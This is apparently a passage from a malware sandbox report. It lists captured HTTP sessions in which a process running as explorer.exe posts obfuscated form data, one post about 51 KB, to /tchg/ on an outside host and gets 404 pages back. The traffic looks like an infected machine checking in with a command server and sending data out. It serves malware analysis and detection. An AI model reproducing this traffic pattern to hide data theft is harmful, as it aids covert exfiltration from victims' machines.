                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    105192.168.11.2049864162.214.206.20080C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:13:54.294806004 CEST1883OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.scottsteedley.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.scottsteedley.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.scottsteedley.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 31 77 6a 2d 6a 75 6a 56 6a 53 28 36 32 31 6d 70 48 46 4f 49 6a 73 61 46 6c 51 4f 56 4d 33 35 6c 5a 79 4b 59 41 7a 66 35 59 45 6f 35 72 46 31 79 37 74 36 68 4a 65 55 69 49 4e 4b 5a 44 44 50 51 56 62 72 4e 4f 2d 4d 38 6f 4f 72 4f 35 56 71 4d 78 55 6e 73 4b 37 53 4e 43 4b 55 37 6b 34 39 6c 48 31 4f 35 66 47 6e 49 7a 4d 53 4b 7a 42 70 4b 58 46 76 47 4e 61 7e 73 4f 51 38 55 36 74 56 79 65 70 6e 70 37 49 76 6e 53 4f 62 41 69 31 41 48 38 4f 64 6e 32 42 30 32 53 51 54 64 47 54 30 72 4e 32 7e 49 6c 6e 6f 73 62 46 64 74 4c 4b 4b 48 6d 55 4f 52 7a 33 44 67 61 35 5a 44 6f 31 4c 71 38 6f 68 51 61 75 52 49 52 4d 71 4d 32 69 75 58 75 37 7a 70 37 30 79 31 6d 69 70 52 45 59 7a 39 4e 6b 77 36 47 67 4d 58 75 42 6b 37 46 49 6b 70 4b 6d 58 43 69 54 6c 54 49 34 66 66 7e 64 75 78 43 47 69 4c 46 51 28 31 6d 37 63 6f 7a 71 44 47 31 38 4b 6a 58 42 44 61 4a 70 76 4f 39 74 66 37 59 50 50 48 64 5f 58 4e 4a 79 71 64 28 6c 71 79 71 79 54 54 46 38 56 58 32 4f 59 36 6c 56 33 55 63 79 36 49 4f 55 39 62 67 7a 63 79 6f 4c 52 6c 7a 42 7a 47 37 42 50 6b 37 44 79 79 73 6e 53 4e 35 71 6f 6c 6c 42 4b 64 35 6a 42 70 41 66 48 73 59 43 7e 48 52 4a 31 33 68 74 64 71 4a 5a 4d 73 52 4c 6c 52 65 68 45 5a 34 33 66 4c 4f 41 50 79 70 37 4b 43 79 55 52 31 30 54 53 32 55 53 32 53 6e 38 53 30 68 38 77 39 6b 5f 30 52 77 32 4c 74 61 4c 78 7a 47 38 53 5a 4c 75 31 71 5a 46 7e 77 35 53 46 55 65 4e 52 64 6a 73 43 51 7e 61 32 37 70 48 62 31 6e 34 58 36 32 71 6e 35 54 59 32 33 63 7a 77 38 76 45 39 33 49 72 37 43 69 64 31 6e 30 74 6f 74 7e 2d 76 4a 51 58 44 4b 4e 77 56 76 64 30 59 4f 49 72 41 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=1wj-jujVjS(621mpHFOIjsaFlQOVM35lZyKYAzf5YEo5rF1y7t6hJeUiINKZDDPQVbrNO-M8oOrO5VqMxUnsK7SNCKU7k49lH1O5fGnIzMSKzBpKXFvGNa~sOQ8U6tVyepnp7IvnSObAi1AH8Odn2B02SQTdGT0rN2~IlnosbFdtLKKHmUORz3Dga5ZDo1Lq8ohQauRIRMqM2iuXu7zp70y1mipREYz9Nkw6GgMXuBk7FIkpKmXCiTlTI4ff~duxCGiLFQ(1m7cozqDG18KjXBDaJpvO9tf7YPPHd_XNJyqd(lqyqyTTF8VX2OY6lV3Ucy6IOU9bgzcyoLRlzBzG7BPk7DyysnSN5qollBKd5jBpAfHsYC~HRJ13htdqJZMsRLlRehEZ43fLOAPyp7KCyUR10TS2US2Sn8S0h8w9k_0Rw2LtaLxzG8SZLu1qZF~w5SFUeNRdjsCQ~a27pHb1n4X62qn5TY23czw8vE93Ir7Cid1n0tot~-vJQXDKNwVvd0YOIrA.
                                                                                                                    May 30, 2023 11:13:54.462641001 CEST1884INHTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/html
                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Tue, 30 May 2023 09:13:53 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1245
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are loo
                                                                                                                    May 30, 2023 11:13:54.462718964 CEST1884INData Raw: 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61
                                                                                                                    Data Ascii: king for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    106192.168.11.2049865162.214.206.20080C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:13:56.982122898 CEST1887OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.scottsteedley.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.scottsteedley.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.scottsteedley.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 31 77 6a 2d 6a 75 6a 56 6a 53 28 36 32 31 6d 70 48 46 4f 49 6a 73 61 46 6c 51 4f 56 4d 33 35 6c 5a 79 4b 59 41 7a 66 35 59 45 77 35 72 33 74 79 39 4f 53 68 49 65 55 69 4c 4e 4b 69 44 44 50 64 56 62 43 45 4f 2d 41 73 6f 4d 6a 4f 38 58 53 4d 78 69 62 73 50 37 53 41 4e 71 55 39 79 34 39 78 48 31 43 74 66 43 33 2d 7a 63 4f 4b 77 47 56 4b 47 43 44 46 44 71 7e 71 4f 51 38 59 6f 64 56 55 65 6f 54 35 37 49 7a 6e 53 4e 76 41 6a 47 34 48 36 65 68 6e 78 52 30 35 4c 41 54 6f 66 44 31 56 4e 32 37 5f 6c 6e 6f 53 62 45 5a 74 4c 4b 71 48 6e 53 47 53 7a 58 44 67 5a 35 5a 4d 73 31 47 6a 38 6f 74 49 61 76 31 49 52 4d 53 4d 33 43 75 58 72 61 7a 71 70 55 7a 77 73 43 70 47 41 59 33 31 4e 67 51 55 47 68 59 58 75 52 41 37 45 37 63 70 49 44 72 43 69 7a 6c 52 45 6f 66 32 77 4e 76 6f 43 47 79 74 46 55 4c 6c 6d 35 51 6f 7a 50 50 47 77 59 57 67 51 68 44 63 56 35 76 62 33 39 54 5f 59 50 28 44 64 5f 58 64 4a 7a 65 64 28 31 61 79 72 7a 54 53 47 73 56 63 7e 75 5a 36 28 6c 7a 4f 63 79 32 51 4f 55 56 4c 67 31 51 79 70 72 52 6c 31 67 7a 42 69 42 50 70 33 6a 79 67 6a 48 53 6b 35 71 6b 54 6c 46 54 5f 35 54 74 70 47 76 58 73 4a 69 7e 59 55 70 31 7a 76 4e 64 57 59 70 4d 73 52 4c 35 46 65 68 49 5a 34 46 66 4c 50 7a 58 79 69 4d 57 43 77 55 52 7a 30 54 53 72 55 53 36 78 6e 38 62 6a 68 34 4e 53 6b 39 34 52 7a 6d 33 74 5a 4b 78 79 57 38 54 54 50 75 30 38 58 6b 44 71 35 52 78 63 65 4e 42 72 6a 66 57 51 39 61 6d 37 28 33 62 32 74 34 58 78 7e 4b 6d 69 5a 34 71 72 63 7a 73 73 76 46 5a 6e 49 74 62 43 6e 70 59 76 76 65 67 54 6f 2d 72 59 54 69 7a 48 4e 57 4a 33 42 32 6b 75 4d 74 6d 61 46 65 31 5a 30 41 32 64 4a 31 55 42 59 63 4c 4a 77 72 53 48 6b 35 4a 51 6f 58 67 41 36 65 78 78 4d 6e 61 32 51 39 35 35 50 43 73 70 75 6c 67 61 66 37 6c 39 6e 42 69 71 4b 57 4c 55 62 6d 31 45 31 55 28 4a 36 43 55 62 58 4c 32 54 32 49 64 65 44 61 71 6d 78 59 70 57 76 6e 76 56 76 45 4e 4e 72 56 65 66 66 43 41 77 42 73 53 49 49 38 4b 6e 49 5f 4e 6d 6c 51 4a 42 49 51 74 75 6f 5f 79 50 48 74 66 78 79 2d 4e 56 76 64 77 75 69 51 6c 37 42 33 6c 45 5a 4d 79 4b 46 69 32 52 51 5f 36 6d 63 69 47 6b 56 6c 67 47 59 55 61 4b 47 37 34 6d 44 74 70 4b 37 73 6c 48 69 4f 46 57 62 6f 78 49 43 42 4b 6f 39 58 34 6c 76 71 33 46 67 43 4d 49 76 2d 78 73 34 4d 52 56 6f 32 59 56 56 5f 49 46 50 44 39 62 6d 43 6c 34 66 6f 50 66 59 4e 69 41 61 68 57 39 4e 52 71 34 67 7a 63 58 48 4c 47 4b 7e 46 64 37 31 48 67 41 53 77 5a 74 74 7a 62 38 77 47 43 54 71 6f 43 53 75 51 48 73 58 4a 6b 72 5a 54 42 56 31 34 55 75 67 70 59 6e 43 47 35 76 71 4f 49 4a 54 34 79 39 46 57 52 65 6b 30 52 4a 4d 4a 37 64 6d 41 54 6f 6b 32 52 48 73 48 31 35 68 68 47 56 42 66 67 67 51 76 38 4f 48 4c 6d 59 6a 41 5a 59 49 4b 72 69 6e 72 73 65 70 50 53 30 48 7a 36 6f 7e 56 4c 48 64 4d 44 5f 44 5a 48 30 44 45 5a 50 77 79 34 6c 64 70 67 5a 52 58 72 45 42 53 47 4c 73 46 46 66 57 49 59 5f 68 33 52 47 41 35 34 66 55 72 41 68 39 50 59 4d 54 48 67 73 46 48 6d 68 75 6b 76 71 48 48 55 55 4f 51 70 68 30 68 66 38 4f 6b 53 5a 33 6d 33 38 66 67 72 35 34 5a 77 39 39 6b 4a 71 79 68 34 62 4b 65 33 72 71 69 62 4d 31 70 4b 39 53 4f 62 35 4a 56 4d 46 66 70 33 5a 4b 70 44 77 49 68 4b 5f 76 37 64 33 77 44 55 5a 52 4d 6c 55 57 74 4c 30 63 53 5a 5f 45 5a 64 74 52 76 78 33 76 55 7a 4b 76 6b 45 68 6e 41 4d 47 45 53 42 63 39 36 47 33 52 57 4d 5f 63 4b 78 77 4e 70 4a 52 4a 33 55 6d 6d 31 43 49 6f 62 4b 36 67 62 4c 5a 55 50 34 64 53 47 42 6e 72 59 35 56 5a 71 50 36 46 38 32 70 67 43 51 61 7a 30 75 37 56 35 75 67 6a 74 36 69 4b 64 4d 6f 71 64 77 74 4d 48 76 4d 53 52 37 78 39 67 59 73 70 76 75 33 52 2d 54 55 75 46 7e 77 4d 36 6b 53 28 47 46 69 7e 30 35 55 7e 75 76 59 63 76 52 66 68 79 35 45 76 6b 57 30 53 39 6a 73 77 7a 75 4f 75 6f 56 61 50 64 73 78 5a 30 32 56 32 75 63 61 61 62 63 6c 6e 44 4c 58 54 71 7a 31 79 6f 56 57 6f 4f 61 78 6a 52 6a 2d 44 6a 46 35 49 77 76 70 45 63 79 6c 6d 30 72 61 52 49 74 73 55 33 39 5f 5a 39 4c 35 6c 31 72 62 51 76 7e 57 4e 76 73 6e 35 67 4a 4f 7a 43 31 66 28 43 54 36 36 54 53 37 43 36 6e 2d 61 5a 32 75 78 72 28 45 6b 57 46 50 51 6d 41 51 55 59 42 5a 61 70 68 4f 56 4b 50 4a 36 47 69 36 53 74 45 6a 46 35 30 34 38 58 34 56 33 6e 28 75 7a
                                                                                                                    Data Ascii: O0qEM=1wj-jujVjS(621mpHFOIjsaFlQOVM35lZyKYAzf5YEw5r3ty9OShIeUiLNKiDDPdVbCEO-AsoMjO8XSMxibsP7SANqU9y49xH1CtfC3-zcOKwGVKGCDFDq~qOQ8YodVUeoT57IznSNvAjG4H6ehnxR05LATofD1VN27_lnoSbEZtLKqHnSGSzXDgZ5ZMs1Gj8otIav1IRMSM3CuXrazqpUzwsCpGAY31NgQUGhYXuRA7E7cpIDrCizlREof2wNvoCGytFULlm5QozPPGwYWgQhDcV5vb39T_YP(Dd_XdJzed(1ayrzTSGsVc~uZ6(lzOcy2QOUVLg1QyprRl1gzBiBPp3jygjHSk5qkTlFT_5TtpGvXsJi~YUp1zvNdWYpMsRL5FehIZ4FfLPzXyiMWCwURz0TSrUS6xn8bjh4NSk94Rzm3tZKxyW8TTPu08XkDq5RxceNBrjfWQ9am7(3b2t4Xx~KmiZ4qrczssvFZnItbCnpYvvegTo-rYTizHNWJ3B2kuMtmaFe1Z0A2dJ1UBYcLJwrSHk5JQoXgA6exxMna2Q955PCspulgaf7l9nBiqKWLUbm1E1U(J6CUbXL2T2IdeDaqmxYpWvnvVvENNrVeffCAwBsSII8KnI_NmlQJBIQtuo_yPHtfxy-NVvdwuiQl7B3lEZMyKFi2RQ_6mciGkVlgGYUaKG74mDtpK7slHiOFWboxICBKo9X4lvq3FgCMIv-xs4MRVo2YVV_IFPD9bmCl4foPfYNiAahW9NRq4gzcXHLGK~Fd71HgASwZttzb8wGCTqoCSuQHsXJkrZTBV14UugpYnCG5vqOIJT4y9FWRek0RJMJ7dmATok2RHsH15hhGVBfggQv8OHLmYjAZYIKrinrsepPS0Hz6o~VLHdMD_DZH0DEZPwy4ldpgZRXrEBSGLsFFfWIY_h3RGA54fUrAh9PYMTHgsFHmhukvqHHUUOQph0hf8OkSZ3m38fgr54Zw99kJqyh4bKe3rqibM1pK9SOb5JVMFfp3ZKpDwIhK_v7d3wDUZRMlUWtL0cSZ_EZdtRvx3vUzKvkEhnAMGESBc96G3RWM_cKxwNpJRJ3Umm1CIobK6gbLZUP4dSGBnrY5VZqP6F82pgCQaz0u7V5ugjt6iKdMoqdwtMHvMSR7x9gYspvu3R-TUuF~wM6kS(GFi~05U~uvYcvRfhy5EvkW0S9jswzuOuoVaPdsxZ02V2ucaabclnDLXTqz1yoVWoOaxjRj-DjF5IwvpEcylm0raRItsU39_Z9L5l1rbQv~WNvsn5gJOzC1f(CT66TS7C6n-aZ2uxr(EkWFPQmAQUYBZaphOVKPJ6Gi6StEjF5048X4V3n(uzuWjmdz79CoHQfsZTxPYf0L6LBWM5Ts8BQ5qgTW7PxdhMhHbTy2t5GLSSAbGs313o8g4fmMuns1eYMEim6(k(qjD68Iyn6EUoh~Ir6e0p9TenM49KjP12YE5UYkY6smoSxr8o_eCEk9JSKRSo8pM(FGs~eFxju7T~0AhwbVBU4cOqGvyinpH582WbjKypqhx8IjRMl6eU_Y9nLkiDcCWHEXnI9XE~V~h3UgopCNcwxcys8CxYTAsMKAS8CUx0WkNoXq36WTsK88K(ETT4XQ-XliqrZ3YTTBDGwya07ByKW1als3o3ayAlGOIvUKF2EdmdUjODFyfj04YC4kf4cBC1qIyXaWHMPUcisvI5W8WEPxlZ0NamwdW3bOuObElVsZnDshzMxkRdz3Tewp-JtZeKmjKLEAt7gV4GKYXADTwSX08T7bGtscoEEvUtKY0wWZlGUsCPS(jhHs6JngiEpjJc6qoQ7gpwl7p8C65ipGsmOqSXyFVCx49D-W7aReBrfupzXVfJGZ2lJfOcR74IlMNMFn3QAa9lgOY0Bu5VPxYlnAh0egePU1OC7BTBQLuAYjrZP7s(sSQF8HfwKJihEbVNuSR7Q0Jgaz5uxAVUDGt2kuLgTrWsyZxBWc_snf8sPaDF44MPnCss5dj1zUOhv(tewv3FxyKRAkxvtJtEJfhycCDmjXCefAhxJP9qQRDl7BFCn8ktPhnvx6Msbz05D~SL67cPMAaHbeDqad9xOffx31Fp2RD~oiEYnt9t7YFHnDWAW3pfO7ghLASE7QZsAguDh8xtYHxwJrFA
                                                                                                                    May 30, 2023 11:13:56.982156992 CEST1892OUTData Raw: 4e 55 72 71 4c 67 6e 55 59 79 62 76 54 69 6f 78 70 75 31 67 77 56 57 51 69 7a 6f 47 71 45 5f 73 54 42 56 58 58 32 44 64 43 78 76 6c 38 32 53 61 6c 4d 4c 6e 4a 68 52 51 61 34 33 45 42 69 71 32 36 44 70 74 32 49 2d 66 76 36 41 46 65 61 77 6a 34 49
                                                                                                                    Data Ascii: NUrqLgnUYybvTioxpu1gwVWQizoGqE_sTBVXX2DdCxvl82SalMLnJhRQa43EBiq26Dpt2I-fv6AFeawj4Ilt031zPUxswKFqKW6hzXoh0DLE-EH~YdGV4VZMLgsP6TPo3cCi30n0sdfRYbmoMfEm5spwLvb8dtviuFx8AivOnpS03SuvyObrm0tUbciS2l3T52l~XTDJr3lORBopqSF~z8X84JlAdmkK2K70C6cocREPdHpG-98
                                                                                                                    May 30, 2023 11:13:57.147414923 CEST1900OUTData Raw: 68 57 51 59 42 68 6e 6e 6c 6d 34 4e 65 78 79 62 6a 33 69 6e 55 48 56 32 79 5a 73 42 39 4f 61 47 73 30 4b 71 43 69 54 78 2d 51 33 69 33 68 33 7e 4b 6a 6d 53 48 47 70 35 51 31 5f 4c 6a 50 4e 36 77 47 69 47 33 41 66 58 35 6a 5a 48 41 34 4b 78 45 58
                                                                                                                    Data Ascii: hWQYBhnnlm4Nexybj3inUHV2yZsB9OaGs0KqCiTx-Q3i3h3~KjmSHGp5Q1_LjPN6wGiG3AfX5jZHA4KxEXoLIM3qit2EIuzDJ(TWNf2eGO7TzS70l1viyonw_8otXL-9DLZclxaa20602pMekxYEdUMDs2x7t(Eq_Og5IP37WBJTHr3EpmGlXcWc1YgP6CZxAXaLsVKxho70IKioenjAlisro05Y3yzTssV~CDxCANf1jX9~WVj
                                                                                                                    May 30, 2023 11:13:57.147525072 CEST1913OUTData Raw: 64 63 6a 7a 32 55 73 4b 43 28 6a 4b 6f 35 78 4d 4a 39 38 36 4a 39 52 59 42 34 79 37 69 4f 2d 77 72 6d 43 30 45 77 57 66 42 46 4a 38 78 35 62 6b 34 4f 66 54 74 53 51 68 4f 35 75 37 4b 78 50 4e 61 69 6d 52 4b 32 52 34 59 42 67 39 36 46 76 4e 39 6f
                                                                                                                    Data Ascii: dcjz2UsKC(jKo5xMJ986J9RYB4y7iO-wrmC0EwWfBFJ8x5bk4OfTtSQhO5u7KxPNaimRK2R4YBg96FvN9oEgBddOXsVbE8WNTj1x3sdul2VnATPHujD45zLjYry7pMcm67Zgvo-MxCF8X1e8JHBznEkuyh1D0X13b3kO8kRgdHEheuPhb8N5DCa6pZCmZzrxyE4uLoE32MqVqaYiHExnnRz3PoRtR8Rc_RlrFeFFEE5rH8q1bcZ
                                                                                                                    May 30, 2023 11:13:57.313009977 CEST1920OUTData Raw: 34 53 47 62 37 4c 61 7e 6c 7a 68 7e 2d 37 73 4e 32 31 67 4b 52 4e 65 7a 47 68 4b 59 45 66 62 65 55 68 6f 56 64 4d 66 57 73 65 5a 44 51 33 43 71 66 71 34 4a 46 44 38 54 35 76 70 68 36 6c 71 6b 72 70 36 78 30 44 33 6a 65 41 4c 79 61 54 48 56 72 47
                                                                                                                    Data Ascii: 4SGb7La~lzh~-7sN21gKRNezGhKYEfbeUhoVdMfWseZDQ3Cqfq4JFD8T5vph6lqkrp6x0D3jeALyaTHVrGXXnWnuR9opCSsSBWnjpJeu9KJDiq03IWHx-WyQBNz79misKwkgg8V1Y7hzS9m~wx3Esf0mX2Stqb2SZRNh1Wgr3aY5lhoRsNt4x64yAS2kDedxJm94rr6q1QZJl7cb7HK0B(99GHa189BlqJ2CxoDXjbm0Rv3xylA
                                                                                                                    May 30, 2023 11:13:57.313123941 CEST1934OUTData Raw: 63 6a 54 53 54 79 64 7a 6c 33 4e 32 73 68 79 32 65 66 44 62 64 42 56 6b 56 69 39 7e 72 51 5f 56 65 30 4e 58 5a 77 53 4e 78 74 6f 32 54 7e 45 50 71 51 36 43 47 54 4d 59 5a 51 38 42 36 52 65 36 71 45 73 43 35 31 4f 64 77 31 58 56 34 54 46 34 63 48
                                                                                                                    Data Ascii: cjTSTydzl3N2shy2efDbdBVkVi9~rQ_Ve0NXZwSNxto2T~EPqQ6CGTMYZQ8B6Re6qEsC51Odw1XV4TF4cH4HycAyYUXbinV90SKjUGWXBgJz3hTEUeqYCibeHsnAdRJA_Yl9rgKHoBKfhMMPJQ-MSGiP43YJWLUoU9s44kpFqzxn72swjYpNB49mCSsrBvl3qH7VmFsqCdsmqJnP1eZPNAgdAlw(08uqQnUafyXhM1cCccJ3ptJ
                                                                                                                    May 30, 2023 11:13:57.313287020 CEST1936OUTData Raw: 42 46 56 62 45 62 49 63 66 6d 56 6e 5f 32 67 54 79 4b 33 72 35 53 51 79 6b 73 79 65 42 42 69 69 51 39 46 63 48 7e 36 67 38 53 4f 36 47 51 76 6f 41 55 50 28 74 6e 4c 4e 72 56 52 75 33 44 67 38 4b 67 4e 54 55 72 65 56 39 69 4e 37 47 6b 59 56 51 56
                                                                                                                    Data Ascii: BFVbEbIcfmVn_2gTyK3r5SQyksyeBBiiQ9FcH~6g8SO6GQvoAUP(tnLNrVRu3Dg8KgNTUreV9iN7GkYVQVgys7Y4Nhq7Wd4xMS-j5xbcgH9dKkCKXetVmLsmNSODfObhYKIfteXhO~e88imnGY0pTYqmC7n9Dl4ht4MFez7q9OKJcv3TLDI9bny9DTYQgfD4jQldJAJHvGmnxeoP3nlD_ONU9WA0WFMG3bL23AafgL7Y0zIfPgh
                                                                                                                    May 30, 2023 11:13:57.313457966 CEST1936OUTData Raw: 73 56 47 44 49 59 61 6a 65 78 36 28 63 51 6b 39 49 55 4d 4f 6c 55 39 53 67 6c 6b 66 61 39 36 79 34 52 76 7e 6f 61 37 4c 5a 4c 78 4f 42 4d 32 39 7a 6d 56 7a 66 70 49 73 47 77 72 6a 65 28 44 55 55 54 75 52 5f 4f 50 76 50 63 72 72 42 62 61 4b 71 62
                                                                                                                    Data Ascii: sVGDIYajex6(cQk9IUMOlU9Sglkfa96y4Rv~oa7LZLxOBM29zmVzfpIsGwrje(DUUTuR_OPvPcrrBbaKqbws58_iqLTNVdPilM9JOwg7neMovYC1vfCsheyFLlDhWTNehOpyO8GmDn2hhrv1fyv04TeyRFSZF3Tu2VwDvIpjRKOR69vhRXdj90NVHW_lbtB18s4nQh12pcIZrBRN0nTn6NDywQbmDM4feTf(H9RYACcNhyYqDPv
                                                                                                                    May 30, 2023 11:13:57.481710911 CEST1938INHTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/html
                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Tue, 30 May 2023 09:13:56 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1245
